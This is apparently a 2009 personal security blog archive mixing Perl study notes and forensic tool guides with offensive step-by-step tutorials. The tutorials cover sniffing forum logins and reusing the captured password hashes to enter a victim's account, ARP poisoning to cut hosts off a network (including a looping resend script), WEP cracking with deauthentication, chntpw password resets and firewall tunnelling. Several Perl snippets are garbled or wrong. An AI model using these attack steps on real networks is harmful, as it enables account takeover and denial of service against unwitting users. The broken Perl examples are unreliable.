Tuesday, December 29, 2009

Perl - Notes

I have decided to learn perl as i began to encouter many perl scripts used for forensics and pentesting. I believe it would help me learn more if i write my own tools and understand the entire process a little bit better. This blog would house my notes and cheat sheets from day one.

Perl is a case sensitive language.

Starting line of every perl program
#!/usr/local/bin/perl

Printing text:
print 'hello world';

When printing from a variable use double quotes instead of single quotes. Information within the single quotes are interpreted as is.
print "$var1";

Declare and assign a variable. This variable is known as a scalar variable. Scalar variables are simple variables containing only one element--a string, a number, or a reference. Strings may contain any symbol, letter, or number. Numbers may contain exponents, integers, or decimal values.
$var1 = 1;
$var1 = 'hello world';

Declare an Array:
@food = ("rice", "eggs", "orange");

Accessing a portion of an array
print "$food[1]"; //this here would print eggs with reference to the above example

Finding length of array just involves redifing the array as a scalar variable. For instance
@food = ("rice", "eggs", "orange");
print "$3"; // This would output '3'

Add and Remove elements from an array
  • push() - adds an element to the end of an array.
  • unshift() - adds an element to the beginning of an array.
  • pop() - removes the last element of an array.
  • shift() - removes the first element of an array.


Concatanate two string variables;
print $string.$linebreak;

Opening a file and printing its contents like the unix program 'cat'
$file_path = '/root/myfile.txt';
open (file1, "$file_path");
@mydata = ;
close(file1);
print @mydata;

Formating Characters
http://www.tizag.com/perlT/perlstrings.php

Regular Expression Cheat Cheets
http://www.cs.tut.fi/~jkorpela/perl/regexp.html

Using substrings.
To use substr() to grab a substring, you need to give it both a string variable to pick something out of and an offset (which starts at 0). The first argument of substr() is the string we want to take something from and the second argument is the offset, or where we want to start at. Substr function can take a third and forth argument, third being the length and forth being a replacement string value.

$mystr = "hello world";

$mystr1 = substr($mystr, 2);
$mystr2 = substr($mystr, 2, 3);
$mystr3 = substr($mystr, 6, 5, "there");

print "$mystr1";
// this would print 'llo world'
print "$mystr2"; // this would print 'llo'
print "$mystr"; // this would print 'hello there'. Note we are printing $mystr and not mystr3 here

Transforming strings into arrays with split function
$mystr = 'the/boy/walked/fast';
@myarr = split('/', $mystr);
print "@myarr"; // this prints 'the boy walked fast'

Likewise we can join elements of an array into a scalar string.
@array = ("David","Larry","Roger","Ken","Michael","Tom");
@array2 = qw(Pizza Steak Chicken Burgers);

@array = ("a") x 10;
print "@array"; //would print the character 'a' 10 times

# JOIN 'EM TOGETHER
$firststring = join(", ",@array);
$secondstring = join(" ",@array2);

Sorting arrays
@myarr = ("chicken" , "eggs", "apples");
@myarr = sort(@myarr);

Conditions and loops are Similar in syntax to C.
[While loop]
$a = ; //Read input from keyboard
while ($a ne "kill")
{
print "wrong";
$a = ; //Read input from keyboard
}

print "Correct";

[For loop]
" for ($x = 0; $x < style="color: rgb(255, 0, 0);">{
print "$x\n";
}

[until statement]
$a = 1;
do

{
print $a;
$a++;
}
while ($a <>

[If statement]
" $a = "hello" ; "
if (length ($a) > 3)
{
print "more than 3 characters";
}

[RE expression] using =~ or !~
$word = "Hello my good friend";
if ($word =~ /my/)
{
print "found the word: my"
exit;
}
print "Not found";

The opposite of the above would be to use '!~' instead of '=~'.

Substitution/replacement:
$word = "canada states";
$word =~ s/canada/United/ //replaces only the first occurance of the string canada with United
$word =~ s/canada/United/g //the addition of the g in the end would replace all occurances of the string. It represents global change.
$word =~ s/[Hh][Oo][Pp][Ee]/Hope/g //This pretty much ignores the case. The next example is a better way to do this
$word =~ s/CanADa/Canada/gi // The 'i' in the end ignores case

$search = "the";
s/$search/xxx/g;

will replace every occurrence of the with xxx. If you want to replace every occurence of there then you cannot do s/$searchre/xxx/ because this will be interpolated as the variable $searchre. Instead you should put the variable name in curly braces so that the code becomes $search = "the";

s/${search}re/xxx/;

Character Translation
$a = "abc";
$a =~ tr/abc/boy/; // will trnaslate a to a b, b to an o and c to a y
print $a; // will print boy

$count = ($a =~ tr/*/*/); //the statement here counts the number of asterisks in the $sentence variable and stores that in the $count variable.

However, the dash is still used to mean "between". This statement converts $_ to upper case. tr/a-z/A-Z/;

Sorting Arrays of words
@array1 = ("orange","yellow","Red","green,","blue");
@sorted = sort(@array1); //Sorts in alphabetical order
@sorted_reversed = sort {$b cmp $a} (array1); //sorts in reverse order

Sorting arrays of numbers
@array1 = (5,7,2,4,1,8,6);
@sorted = sort (@array1); //sorts in alphabetical order
@sorted_reversed = sort {$b <=> $a} (@array1); //sorts in reverse order

Key Functions to remember
my $position = index($longString, $shortstring); //returns the position of a character or substring in a string
splice (@myarr, 2 , 3); // If you have an array of 7 elements, this function reads all the 5 elements and starting from with position two(which is actually the third position, as the first element starts with a 0) cuts the next three elements.

Monday, December 21, 2009

pcapcat, dumping the contents of a tcp stream

Pcapcat is a simple perl script that can dump the contents of a tcp stream. The script gives an index of the tcp streams that it identifies (by default shows only new tcp connection streams, those initialize by syn packets but you have the option to show all already established connections as well) and you would use this index to indentify which stream you would like to dump.

usage:
# perl pcapcat -r pcap_file // displays new connection streams. Already established connections would be ignored

# perl pcapcat -r pcap_file -a // '-a' displays already established connections. Useful in many cases where the initial communication had already commenced like a conversation.

# perl pcapcat -h // gives you a listing of all the options used with pcapcat

Resources/Good reading:
http://blog.kiddaland.net/2009/09/network-forensics-puzzle/

smtpcat, Parseing emails from a pcap file

I learned of the tool from a forensic contest blog i've been following for awhile now. This tool came about when a challenge was posed to determine the contents of an email from a pcap file. I've posted the solutions to this contest in an early blog entry (still have to update the part on getting the password) but my methods were not very automated and as easy as one might want things to be. A perl script, Smtpcat, came about to resolve this issue. From the author, Amar Yousif,
"I wrote smtpcat which will loop through a pcap file and identify all of the smtp conversations in it. Smtpcat dive deep into the payload and identifies the sender, receiver, date, subject, and optionally the AuthSMTP decoded password. The tool also has the ability to dump the payload of any smtp message as an eml file that can be further opened via outlook express for example. "

This tool definitly would make my life easier when pasrsing through network captures for email messages and its contents. Im happy i did things using a more manual procedure, just goes to show that i understood what i was doing.

usage:
# perl smtpcat -r pcap_file -p // '-r' reads the pcap and '-p' tells smtpcat to decode the smtp password

[1] 192.168.1.159:1036 -> 64.12.102.142:587
[1] sneakyg33k@aol.com -> sec558@gmail.com Sat, 10 Oct 2009 07:35:30 -0600
[1] SUBJ: lunch next week
[1] PASS:558r00lz

[2] 192.168.1.159:1038 -> 64.12.102.142:587
[2] sneakyg33k@aol.com -> mistersecretx@aol.com Sat, 10 Oct 2009 07:38:10 -0600
[2] SUBJ: rendezvous
[2] PASS:558r00lz

The above shows two email conversations being sent. Smtpcat identifies the sender and recipient as well as the smtp password.

# perl smtpcat -r pcap_file -p -d 2 -w message.eml // '-d 2' dumps the content of the smtp message from index 2 (index 2 was identified with the first command output above). '-w' writes the contents of the smtp message to a file

You can then open the message.eml file in outlook express to get the email body and possible attachments.

For more commands type: # perl smtpcat -h

Resources/Good reading:
http://forensicscontest.com/contest02/Finalists/Amar_Yousif/narrative.txt
http://www.yousicurity.com



Wednesday, December 16, 2009

Replaying captured web traffic using ncat

If you are not familiar with the whole idea of replaying a packet then you should get to googling. The basic idea behind this methodology is to sniff and capture interesting information from either the client or server then replay them. By doing this you can mimic a certain client's request or a server's response and vice versa. In the my demo, i will demonstrate how i was able to capture a users 'GET' request for a website (in my demo, www.ask.com) and the server's response and use the captured response to replay the same data that www.ask.com responds with to client request. This has the effect of mimicing a site and in some ways tricking a user to believe they are at the website of www.ask.com when they are basically connected to your machine. Not as fun as gaining a shell but with your imagination, you can come up with ideas for interesting packets to replay that can form the basis for some more fun stuff.

Steps:
  1. Use wireshark to capture packets of a user making a request for www.ask.com on their web browser
  2. Use a display filter for that stream and filter the stream to show only the servers response. Save the data of the servers response to a file.
  3. Start up ncat to replay the saved response(data)
    "# ncat --send-only -l 80 < response"
  4. Use a web browser to connect to your ncat 'fake' webserver.
If you were to practice this on a few websites you're gonna notice that not all of the contents of the page might be displayed. If you've written html code before, you should already know why this is so. If you wanna get crafty and do some editing of the packets to change some directory paths, that should get things up and running, but to me its not worth the effort since im no criminal. YES, if you actually took the time to modify the response in such a way that you will get all the original's website content to show, then you more than likely have some evil intentions in mind.

Video demonstration...

Untitled from aerokid240 on Vimeo.

Thursday, December 10, 2009

SSH public and private key authentication

If anyone has played with ssh before, you should be quite familiar with login in with your password/passphrase to the ssh server. There is nothing wrong with this method of authentication at all as long as you have a complex password thats extremely hard to guess. However there is a more advanced method of authentication used by many professional organizations and businesses and the internet as well, known and Public key authentication. This system utilizes two keys, a public key known to everyone and is used for encryption and a private or secret key known only to the recipient of the message. In ssh, the use of the private keys are only for authentication purposes but then all of the communications are done using a negotiated symmetric key, which is a key common to both the sender and reciever of the message that is used to decrypt and encrypt the message.

SSh is commonly used for remote administering of machines, but is very common in the unix environment. As an administrator, we want to be able automate most of our tasks remotely over ssh, but the problem that arises is the password prompt screen. How can we automate a remote task if the machine we are login into is gonna ask for a password everytime we try to log on? The answer is to utilize the public and private key authentication method. You specify a private key to be used to authenticate on to the remote machine. The remote machine should have a matching public key under the logging in user account. Wants the pair of the public and private key is made, access is granted automatically withouth the use for a password/passphrase.

[tools]
sshd [linux]
Putty [windows]
Puttygen [windows]

Step 1. Using puttygen, generate a 1024 bit rsa keys and save the public and private key portion to a USB key (mykey.pub and mykey.ppk ).

Step 2. Copy the puiblic key (mykey.pub) to the unix machine into the "/root/.ssh/" folder

Step 3. Convert the puttygen public key to an openssh format.
# ssh-keygen -i -f /root/.ssh/mykey.pub > mykey2.pub

Step 4. Paste the contents of the public key into a file called authorized_keys or
authorized_keys2
# touch authorized_keys
# cat mykey2.pub >> authorized_keys

Step 5. Using putty, enter in root@10.0.0.1, assuming 10.0.0.1 is the remote hosts ip address.

Step 6. Under the 'Connections' section in putty, goto the 'SSH' sub section then 'Auth'. Browse
for your private key (mykey.ppk) then click on open

If all went well you should be granted access to the root account without having to enter a password. If you were using a linux client, this could have been automated using bash scripts and all that is required is for you to place your private key in your local home directory in the .ssh folder, i.e, /home/user1/.ssh/

Resources/Good reading:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
http://hkn.eecs.berkeley.edu/~dhsu/ssh_public_key_howto.html

Wednesday, December 9, 2009

Video Demo of me exploiting Internet explorer 6 on XP SP2

It cannot be stressed enough why you should always try to keep your software patched and up to date. Alot of individuals understand that updates can add new features and fix some bugs but don't have a clue about the security aspects of it. You may have come around the term 'exploit' before but don't really quite grasp the concept of it. An exploit is special code that attempts to capitalize on what is known as software vulnerabilities, and in capitalize i mean do something that is of the benefit to the attacker. In the hacker culture, most of the time we would want to exploit software in hopes of gaining "shell" access which is basically a command prompt environment of the exploited machine. Picture being at a Windows machine at the command line and the amount of power you have at your arsenal. You can create user accounts, kill process, create and delete files, etc. This is what the hacker hopes to gain from his exploit, such an environment where he can command your machine via a shell, i.e. command prompt from his own attacking machine.

In my video demonstration, im gonna exploit a vulnerability in IE 6 on a XP SP2 machine. The attacker sets up his machine as a special type of web server awaiting a user to connect to his machine using internet explorer(you can force a user to connect to your machine via dns spoofing on a LAN, see my earlier post on dnspoof). When the victim browses to the attackers web page(of was forced onto the page by the attacker) an exploit is run on the victims browser and on the attacking machine if the exploit was successful you would get a command prompt/shell of the victims machine. From here the attacker can take command of the victim's computer and is only limited by his imagination.

[Tools used]
Metasploit-v3.4


Internet Explorer 6 exploit from aerokid240 on Vimeo.


Tuesday, December 8, 2009

New Video demos

[Breaking into facebook and gmail without a username and password]
***** http://aerokid240.blogspot.com/2009/11/ferret-and-hamster-20-sidejacking.html

[Eaves dropping on your neighbours msn conversations]
*****http://aerokid240.blogspot.com/2009/11/msgsnarf.html

[Exploiting IE6 on XP SP2 machine to gain shell access]
*****http://aerokid240.blogspot.com/2009/12/video-demo-of-me-exploiting-internet.html

Monday, December 7, 2009

Video illustrations on the way...

I know some of the demo's my leave you a bit puzzled at times but some of the concepts cant be adopted overnight. And as you would have noticed, most of the demo's use linux quite heavily adding to the frustration to most windows users. The good news today is i just got an account with www.vimeo.com so now i can add video illustrations to some of my blogs. I'm gonna go back to some of my previous post and add some video illustrations to them. If there is any request for any visual illustration on any previous post, just leave a comment or shoot me an email.

Saturday, December 5, 2009

How you can steal log-on credentials from forum based websites using Paros and ngrep

As you can imagine, ngrep would be our sniffer that would parse out the necessary information that we would be looking for. But what is Paros and what is it gonna be used for? Paros is a proxy, but unlike traditional proxies, it allows you to modify certain parameters in http request and reply packets. How we are gonna use it in our demo is to modify the password field of a http POST to input the appropriate password. Confused? Well just follow my demo and hopefully all will be clear.

First we use ngrep (look back at my earlier post for info on using ngrep) to sniff out the important information when the user logs in. Note that sometimes the passwords may be in cleartext or in a md5hash. If the password is in MD5 hash form, we can use online resources to crack them or dont even bother cracking them. Why not just use the hash to login? Is it possible? Yes.. and thats what ill be showing you.

[Note, you would be required to perform some form of man in the middle attack in order to be able to sniff the packets]

Setting up ngrep to sniff:
# ngrep -W byline -d eth0 -q "POST" port 80 //we are sniffing of port 80 for the string 'POST', i.e when a user hits the login button a post would be send to the logon server. '-W byline' makes the output to standard out more readable.

On some other machine [victim machine], login to your favorite forum website and pay attention to ngrep's output. It should have captured the post packet with your username and password. Like i said earlier, sometimes the password is not in plain-text. Sometimes it would be and MD5 hash. Lets see how we can use this hash with Paros proxy.

Lets fire up Paros on the attacking machine.
# java -jar paros.jar

On the attacking machine, open up your web browser and change its network settings to use the proxy 127.0.0.1 on port 8080. Trying browseing to a website to confirm the proxy works. Paros should now have captured traffic.

In the "Trap" tab select "trap request". Now navigate to the same forum website that you've captured info from. On the login form, put in the username that you would have captured and some bogus password and hit the submit button. Notice that the web page is stuck loading and paros is blinking. Lets investigate. Paros has captured the request and is awaiting on some sort of feedback from you. At this point you can see that paros has captured the login request. The username is the right one u typed in and the password is in some encrypted md5 form. Its actually the md5sum to the bogus password you inputed. What we wanna do is take the md5 hash that we captured from the ngrep output, and input it in the paros parameter screen (easier to view it in tabular view). Note you gon need to enter it in two places, the "vb_login_md5password" and "vb_login_md5password_utf". After you've done this, deselct the trap request option and hit the continue button. Guess what has happend............... You've now logged into your victims account.

To help in my above illustration, here's a video illustrating the simplicity of the attack. Note that the user uses a different sniffer to sniff on the wire.

[video]: http://www.securitytube.net/How-Secure-is-your-Forum-Login-video.aspx

Resources/Good reading:
http://www.securitytube.net/How-Secure-is-your-Forum-Login-video.aspx

Using netcat to stream music with mpg123

Like my previos post, i used netcat as a simple one page webserver, basically having netcat listen on port 80 and anything that connects to port 80, send them an html file. Simple enough. This post shows how we can use the same concept and listen on a port and send an mp3 over the network to connecting clients. Mpg123 is a command line utility that basically play music on the command line. You can see how netcat and mpg123 is used together to stream music accross the network.

Demo:
[server]10.0.0.1
[client]10.0.0.2

[server] # cat music_file.mp3 | nc -l -p 4444 //listens on port 4444 and cats the contents of the mp3 file accross the network

[client] # nc 10.0.0.1 4444 | mpg123 - // connects to the server on port 4444 and plays what ever data comes through its connection


Resources/Good reading:
http://www.hak5.org/episodes/episode-514

Thursday, December 3, 2009

Using netcat and ncat as simple webservers

Nothing too fancy here, but just an illustration of how versatile the netcat tool is/can be. We all know netcat to be a simple backdoor utility that can be used for simple chats and file transfers. Well to add to its long list of possibilities and features, i am going to set up a one page webserver. Useful if you got to set up a notification about your page being down for maintenance. In its basic form, we set up a netcat listener on port 80 then pipe or push a file into the connection when clients connect.

[for netcat] "# while true; do nc -l -p 80 -q 1 < index.html" ; done
[for ncat]
"# while true; d0 ncat -l 80 --send-only < index.html ; done"

Note: we set up a while loop to keep the connection open to accept other requests. Using "-k" in ncat would not work in this instance as using the "--send-only" terminates the connection when all data has been sent to the client.

References/Good reading:
http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
http://www.stearns.org/doc/nc-intro.current.html

Another example where physical access always gets you in (using chntpw)

Chnypw is a small linux utilty that is used to (re)set the password of any valid local account on a windowsNT, 2000 and XP machine (have not tried on vista and 7). Knowledge of the old password for an account is not needed to set a new one. The tool works by modifying crypted data in the registry's SAM file. This utilty works with syskey and includes the option to turn it off.

The target Windows machine needs to be in offline mode which means that the installed OS should not be loaded. You're gonna need a bootable linux distrobution (CD or bootable usb works) with chntpw package installed.

Steps:
  1. Mount the NTFS drive. Needs to be mounted for read/write and not read-only.
    # mount -t ntfs-3g /dev/sda1 /mnt/disk1 or # ntfsmount /dev/sda1 /mnt/disk1 -o default_permissions
  2. Navigate to the location of the SAM file, typically located at \windows\system32\config
    # cd /mnt/disk1/WINDOWS/System32/Config
  3. Make a back up of the SAM, security and system files.
    # cp SAM SAM.bak && cp security security.bak && cp system system.bak
  4. Run chntpw in interactive mode with the SAM, system and security file as arguments.
    # chntpw -i SAM security system
  5. You should be presented with an interactive screen where you can list the local users and change or reset their passwords.
    NOTE: It is known that changing the user's passwords here are less reliable to work than actually just resetting/blanking their passwords. I would suggest to just blank the passwords if applicable then when you get into windows, change the passwords their. Use an "*" to Blank passwords in the interactive screens in chntpw.
  6. Remember to save your changes before you exit.
  7. Reebot computer and login to windows to see if your hack worked (more than likely it did)
For more chntpw options (although you probably wont need nothing else), type:
# chntpw -h

#chntpw help and usage

chntpw version 0.99.3 040818, (c) Petter N Hagen
chntpw: change password of a user in a NT SAM file, or invoke registry editor.
chntpw [OPTIONS] [systemfile] [securityfile] [otherreghive] [...]
-h This message
-u Username to change, Administrator is default
-l list all users in SAM file
-i Interactive. List users (as -l) then ask for username to change
-e Registry editor. Now with full write support!
-d Enter buffer debugger instead (hex editor),
-t Trace. Show hexdump of structs/segments. (deprecated debug function)
-v Be a little more verbose (for debuging)
-L Write names of changed files to /tmp/changed
-N No allocation mode. Only (old style) same length overwrites possible
See readme file on how to extract/read/write the NT's SAM file
if it's on an NTFS partition!
Source/binary freely distributable. See README/COPYING for details
NOTE: This program is somewhat hackish! You are on your own!

Resources/Good reading:
http://home.eunet.no/~pnordahl/ntpasswd/index.html
http://linuxbasement.com/content/changing-nt-passwords-with-linux-and-chntpw
http://rhadimas.wordpress.com/2006/10/15/reset-windows-password-w-knoppix/

Wednesday, December 2, 2009

Sniffit, packet sniffer and monitoring tool

Sniffit is a nice little sniffer that gives you the ability to zoom in on already established connections and view the data. Its mainly useful in MITM situations. Picture being in the middle of a telnet session or in the middle of a netcat chat. With sniffit, you can watch the communications going back and forth and possible gaain the knowledge of confidential info.

To run sniffit:
# sniffit -i -F eth0 //opens up sniffit in [-i]nteractive mode and [-F]orces the program to listen on the specified interface

To listening in (zoom into) a connection just hit the Enter key. To get out of it, hit the "q" key. For some useful satatistics hit the "n" key. to completly close out of the program hit the "q" key again.

Tuesday, December 1, 2009

Steganography (using steghide)

Steganography is the ability to hide data in plain site. Hidden messages are hidden in such a way that no one other than the sender and the intended recipient should be aware of its existence. What that means is the picture that someone may have sent to you and a few other people could possible contain a hidden message and possibly only one or two of the recipients may know of its existence.

Steghide is a steganography program that has the ability to hide data in various image and audio file formats. The embeded data can be compressed and encrypted. Some supported file formats are JPEG, BMP, WAV and AU. There are no restrictions on the format of what the secret data should be. It runs on both Windows and linux OS's

Demo:
Create a text file and type something in it that you wish to hide[name it confidential.txt].

Next, locate a jpg or bmp file that you would like to use as the cover file to hide the text file into.
When you get your image file run this command to test its storage capacity:
# steghide info image_file.jpg

Next lets embed our confidental.txt in the image file. By default, the embeded data would be encrypted with rijindale(aes - 128 bit) encryption in cbc mode. Note you would have to enter a password.
# steghide embed -cf image_file.jpg -ef confidential.txt

To extract the file run the following command then enter the password:
# steghide extract -sf image_file.jpg

Thats all to it.

[options]
"-cf": cover file to use
"-ef": file we want to hide
"-sf": this is the name of the stego file that we have created
"-e": specify encryptionto use if the default doesnt suit you.

To find out about the other encryption algorithms that you can use type:
# steghide encinfo

Resources/Good reading:
http://steghide.sourceforge.net/
http://en.wikipedia.org/wiki/Steganography
http://linux.die.net/man/1/steghide

Monday, November 30, 2009

Manually modifying a Network packet, the way the pro's do it

In my previous post, i spoke about using ettercap and and a plugin "Isolate", to take down a host on a network. It poisons the arp cache of the victim's machine into linking its own mac address to the router's/gateway's IP address, thus achieving a complete denial of service (google:DOS attact). In this post, im gonna be discussing how you can perform such an attack using a more manual method, manually constructing the malicious packet.

File2cable is a simple program that sends a file as a raw ethernet frame over a specified interface.

Hexedit is a simple hex editor for unix machines.

In this demo, we are going to isolate a host,just like we did with ettercap and it's Isolate plugging.

The first thing that you want to do is to use wireshark and capture a "ARP reply" packet. When you got that packet (to use as a prototype), export that frame/packet bytes to a file (for this example, ill name the file "arp_reply"). Open the file with hexedit (# hexedit -b arp_reply). Now, the idea behind modifying the packet is knowing what to change. You want to have wireshark and hexedit opened side by side so you are watching both screens. In wireshark pay attention to the hexdump frame at the bottom While doing that, in the frame above that select the layer 2 frame(Ethernet II) and notice that a certain amount of bytes are selected in the hexdump below. The selected bytes are a representation of the ethernet frame. Now within that ethernet frame, break it down to tree view and select destination. Notice the selection in the hexdump now. Anything familiar about the hex bytes selected? Its the destination mac address. Now you can select other items in the Ethernet frame II portion and notice the different hex representations for your selections. Now we can change these things using hexedit. We use wireshark as a reference so we know which hex bytes to change in hexedit. This is the main idea of manually altering a packet.

Now im going to tell you everything that you need to change using hexedit. Please note that we are in the hex realm of things, the changes you are going to make are gonna be the hex representations of certain values(Note that the mac address is already in HEX, so no conversion necessary)

[Ethernet II]
Destination: Set this to the mac address of the target host (victim who's arp table we are going to poison)
Source: Set this to your network interface's mac address (put the real thing otherwise it wont work)

[ARP]
Sender MAC address: You must set this to the target host's own mac address (we poison his cache here)
Sender IP address: We set this to the router/gateway's IP address in hex of course
Target MAC address: We set this to the targets mac
Target IP address: we set this to the targets IP address


Press ctrl+x then hit the enter key, to exit and save the packet you just modified. Now to test this attack, on your victims machine, pull up a command prompt and check your arp cache (arp -a). Make a note of your routers ip to mac address mapping. Next send our packet/file onto the wire/network with file2cable, which can also be used in wireless networks as well (# file2cable -i eth0 -f arp_replay). Now go check the arp cache on the victims machine. See the difference? If you try browsing to websites and things dont work, then it worked and this machine has been taken down.

Since a computer's arp cache normally refreshes around every 5 minutes, our attack wont be very long term. What we can do is right a script that would send our malicious packet ever few seconds. We use secounds instead of minutes because the router can send a arp request to the victim and when the victim reponds accordingly, the victim naturally will learn the mac to ip mappings of the arp requester. We can write a script as follows:

#!/bin/bash

while[1];do
file2cable -i eth0 -f arp_reply
sleep 10
done

The above script will loop the file2cable commands every 10 seconds.

Here is a quick visual from an arp cache poisoning attack using hexedit and wireshark to capture and modify an arp packet: http://www.docstoc.com/docs/9852261/ARP-Spoofing-Tutorial.
It should give you an idea visually what you have to do/change when using wireshark and hexedit in conjunction. However, please note that they are performing a different attack from what i demonstrated here. If you think you have my example convered, try their example next and get a good feel for things.

Resources/Good reading:
http://www.docstoc.com/docs/9852261/ARP-Spoofing-Tutorial

Take down any host on a network using Ettercap's plugin Isolate

Ettercap is a very popular password sniffer and packet analyzer. It comes pre-built with many plugins, including isolate in which im gonna briefly discuss here. This plugging allows you to literally take down a host on a network. For example, if you find out that you have a user using the internet for malicious purposes, why not just take him out? The theory behind this attack lies around poisoning the users arp cache. Since a computer on your LAN that communicates on the interenet relies on knowing what the mac address of the gateway or router is, it wont be hard to imagine what would happen if we tell your machine that in order to get to internet, send all packets to another mac address. More interestingly, say the router's ip address is 192.168.1.1, if we poison the arp cache of a machine to link the routers address or 192.168.1.1 to that computer's own mac address what would result is a complete denial of service. Whenever that users machine tries communicate on the web, all his packets would be send to his own mac address. Talk about a state of confusion

This attack may take up to 5 mins to work. It relies on the arp cache entry to time out before it needs to refresh it self.

# ettercap -Tq -i eth0 -P isolate /192.168.1.103/ //

The above command would complete take the host 192.168.1.103 down. You can run ipconfig /all on you windows machine and arp -a, then compare the mac address. If they are the same, then you just pwned that machine. Now you can tell those pesky torrent whores just before you take them down, "Say hello to my lil friend.....".....Isolate.

Resources/Good reading:
http://wcosughacking.blogspot.com/2008/07/isolate-ip.html

Cracking WEP with aircrack-ng ( cheat sheet)

We all should by now be aware of the famous insecurities of the wireless encryption WEP. Because of its implimentation of weak IVs (initialization vectors) in the packets, it becomes quite easy to guess certain packets (arp broadcast for example). The idea behind the attack is to capture enough packets so a program like aircrack can perform some analysis on the capture IVs and hence derive what the WEP key should be. We would be using the aircrack-ng suite of tools to crack us some WEP. Please perform this attack on your own network. This should be used only to audit the security of your own network or neworks to whom you have the right permissions to audit.

[Cheat sheet] using Bactrack4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your mac address to a random fake one
# ifconfig wlan0 up //bring back up the wireless intereface
# airmon-ng start wlan0 //create an interface that listens on monitor mode
# airodump-ng mon0 //analyze the air for potential WEP targets
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_tacgetAP" -w wep.pcap mon0 //start capturing packets of your intended victim
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --fakeauth 0 mon0 //perform a fake authentication to access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "Connected_client_mac_address" mon0 //Send deauth packets to disconnect a client from the target access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" -3 mon0 //perform arp replay attack to speed up the data retrieval process
#aircrack-ng -b "mac_address_of_targetAP" -P 2 wep.pcap-01.pcap //when there is enough packets (10000 or more) use aircrack this way to attemp to crack the WEP key


Thats it ...
Please use google to find out more information about the insecurities of WEP.

Saturday, November 28, 2009

Ngrep

Ngrep is a basic packet sniffer with its main feature being the ability to filter through network packets, searching(grep) for certain strings in the packets being sent over a network and display the matching string's packet content in a readable format. Think of it like unix's grep but done over network streams. Ngrep uses standard tcpdump filters, host 192.168.1.1, port 80, etc.

Examples:

# ngrep -d eth0 port 80 // displays all port 80 traffic on interface eth0

# ngrep -d eth0 "google.ca" port 80 // parses through port 80 traffic data for string google.ca

# ngrep -d eth0 "*.google.ca" port 80 // parses through port 80 traffic for *.google.ca, where the * can be anything.

For better visual output add "-W byline" option

# ngrep -d eth0 -W byline "msn.com" port 80

To search for more than one string

# ngrep -d eth0 -W byline -i "pass|USER" -n 2 port 80 // searches for string 'pass' or 'USER'. "-i" ignores the case of pass or USER. "-n 2" will match only 2(any number can be specified) packets total, then exit.

# ngrep -n 2 -q -d eth0 -W byline -wi "pass|USER" port 80 // searches for string 'pass' or 'USER'. "-i" ignores the case of pass or USER. The "-w" tells ngrep to match the string as a word. "-q", quiet mode; don't output any information other than packet headers and their payloads (if relevant).

The following can parse for logins to gain passwords:

# ngrep -d eth0 -W byline -i "pass|USER" port 80 |grep pass

More examples mimiced from: http://www.brandonhutchinson.com/ngrep.html

Usage examples:
ngrep '' udp (print all UDP packets)
ngrep '' icmp (print all ICMP packets)
ngrep '' port 53 (print TCP or UDP port 53 packets)
ngrep '' tcp port 23 (print TCP port 23 packets)
ngrep 'LILWORD' port 138 (print Microsoft browsing traffic for NT domain LILWORLD)
ngrep -iq 'rcpt to|mail from' tcp port 25 (monitor current delivery and print sender and recipients)
ngrep 'user' port 110 (monitor POP3)
ngrep -q 'abcd' icmp (Microsoft operating systems fill the ICMP payload with the alphabet; is the "pinging" host running a Microsoft operating system?)
ngrep -iq 'user-agent' tcp port 80 (determine client application that client host is running)
ngrep '220' port 21 (determine version of FTP server)
ngrep 'SSH' port 22 (investigate Secure Shell)
ngrep -v '' port 23 (see all traffic but telnet)

Resources/Good reading:
http://ngrep.sourceforge.net/usage.html
http://www.linux.com/archive/articles/46268
http://www.security-freak.net/tools/ngrep/ngrep.html
http://www.brandonhutchinson.com/ngrep.html

Friday, November 27, 2009

HTTPtunnel, Another way to tunnel your traffic to bypass firewalls

Like the title says, Httptunnel allows you to create a tunnel (non-encrypted i might add) so you can redirect ports or by pass firewalls. Its not the most preferred method to tunnel traffic as there is no encryption mechanism to keep your actions hidden like ssh tunneling or stunnel would offer. Never the less, its a easy utitility to get up and running quickly and works on both linux and windows system.

[server]linux, 10.0.0.1
[client]windows, 10.0.0.2

On the server [linux]:
For this, you are required to have some sort of service running locally. We are gonna use a webserver on port 80. Start the webserver and have a demo index.html page in the necessary folder so clients would be greeted with a page. Then run the httptunnel server as follows:
# ./hts -F 127.0.0.1:80 4444 //Listens on port 4444, and forwards all traffic to itself (127.0.0.1) on port 80

On the client [windows]:

c:\>htc.exe -F 5555 10.0.0.1:4444 //Listens on port 5555 and connects to the awaiting httptunnel server at 10.0.0.1 on port 4444

Now on the client, open up a web browser and type in the url, http://127.0.0.1:5555. If everything works fine, you should be greeted with the webpage at 10.0.0.1

Resources/Good reading:
http://www.nocrew.org/software/httptunnel.html
http://en.wikipedia.org/wiki/HTTP_tunnel
http://www.neophob.com/serendipity/index.php?/archives/85-GNU-HTTPtunnel-v3.3-Windows-Binaries.html
http://sebsauvage.net/punching/

Foremost

Foremost is a very popular tool in the open source forensic world. This can recover files from practically anything, from hard disks, disk images, pcap network capture and your RAM. Unfortunatly, Due to programming difficulties, foremost is limited to processing files smaller than 2GB in earlier versions. In version 0.69, maximum file carv size was 4GB. Foremost served as the basis for other file carving applications such as scalpel and tcpxtract. The program uses a configuration file (foremost.conf) to specify headers and footers to search for and carv out.

Foremost.conf comes with preconfigured headers and footers for well known file types. The configuration file is not limited to whats there by default, but can be extended with by adding your own headers and footers or make a custom config file.

# foremost -i file.img -t doc -o /root/Foremost_Dir -c /etc/foremost.conf

'-i': Input file(image). Can specify a drive or partition as well, /dev/sda1
'-o': Folder to dump the recovered files in
'-t': Type of file to search for. Default is to search for all known file types in its config file.
'-c': [optional] Sets the config file to use. If left out, foremost is gonna use its defaul config file located at /etc/foremost.conf

[Supported file types out the box]['-t']
jpg
gif
ong
bmp
avi
exe
mpg
wav
riff
wmv
mov
pdf
ole
doc
zip
rar
htm
cpp
all

As mentioned earlier, Scalpel is based on foremost. Scalpel is more efficient and faster than foremost. Foremost's authors have recommended that practitioners use Scalpel instead of Foremost as well.

Resources/Good reading:
http://www.forensicswiki.org/wiki/Foremost
http://www.forensicswiki.org/wiki/Scalpel
